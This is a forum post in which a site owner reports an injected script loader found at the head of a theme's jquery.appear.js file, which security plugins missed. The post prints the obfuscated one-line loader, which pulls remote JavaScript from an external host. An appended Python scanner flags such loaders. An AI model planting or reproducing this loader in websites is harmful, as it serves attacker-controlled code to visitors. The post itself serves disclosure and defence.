Malicious function not detected in any scan
Hello,
A few days ago my site was hacked.
Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.
After requesting several revisions without success, we found the problem.
A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.
It is only shown when loading certain pages in the browser code inside (it is not always shown…)
This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S, AIO S, and Anti-Malware Security and Brute-Force Firewall. None have detected it.
This is why we are advising every plugin we have named (and used) to review that malicious code and add it somehow to their scan lists.
Apparently it is relatively new and little used; there are very few references on Google (https://www.google.com/search?q=cX458IXVf9TcXk%2FnhNa%2By0nWDAAY7JxpQFgRZT9%2FnUk%3D&newwindow=1&rlz=1C1UUXU_esAR993AR993&sxsrf=APwXEden26t fFRvJGkav31Fi7ZMfrTUvk)
Copy of the code found in the head of the file: “jquery.appear.js”
;(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; s.parentNode.insertBefore(h,s);})(window,document,'script','https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');
I hope it works for you. If you have any questions, ask me.
Greetings.
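A static check for the kind of loader quoted in the post, as an added example that is not part of the original post or of any plugin named in it: it flags string-literal URLs on hosts outside a site allowlist when they sit next to code that creates and attaches a DOM element, without relying on a literal `createElement('script')` call. The allowlist, the placeholder host `scripts.example.invalid`, the 600-character context window and the function names are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# Assumption: hosts this site legitimately loads scripts from; edit per site.
ALLOWED_HOSTS = {"example.com", "cdn.example.com"}

# Absolute or protocol-relative URL inside a JS string literal.
URL_LITERAL = re.compile(r"""["']((?:https?:)?//[^"'\s]+)["']""")
# What a script loader needs nearby: create an element, attach it, name the tag.
CREATE = re.compile(r"\.createElement\s*\(")
ATTACH = re.compile(r"\.(?:insertBefore|appendChild|append|prepend)\s*\(")
SCRIPT_TAG = re.compile(r"""["']script["']""", re.IGNORECASE)

def find_injected_loaders(js_text, allowed_hosts=ALLOWED_HOSTS, window=600):
    """Return (line, host, url) for off-allowlist URLs next to loader code."""
    findings = []
    for m in URL_LITERAL.finditer(js_text):
        url = m.group(1)
        try:
            host = urlsplit(url if url.startswith("http") else "https:" + url).hostname
        except ValueError:  # malformed URL literal: nothing to compare
            continue
        if not host or host.lower() in allowed_hosts:
            continue
        ctx = js_text[max(0, m.start() - window):m.end() + window]
        if CREATE.search(ctx) and ATTACH.search(ctx) and SCRIPT_TAG.search(ctx):
            line = js_text.count("\n", 0, m.start()) + 1
            findings.append((line, host.lower(), url))
    return findings

def scan_tree(root):
    """Scan every .js file under root, e.g. a theme directory."""
    hits = {}
    for path in Path(root).rglob("*.js"):
        found = find_injected_loaders(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: same shape as the snippet in the post, placeholder host.
SAMPLE = (
    ";(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];"
    "h.async=1;h.src=o;s.parentNode.insertBefore(h,s);})"
    "(window,document,'script','https://scripts.example.invalid/PLACEHOLDER');\n"
    "(function($){ $.fn.appear = function(){ return this; }; })(jQuery);\n"
)
CLEAN = "(function($){ $.fn.appear = function(){ return this; }; })(jQuery);\n"
```

Legitimate third-party loaders (analytics, tag managers) are reported too until their hosts are added to the allowlist, so the output is a review list rather than a verdict.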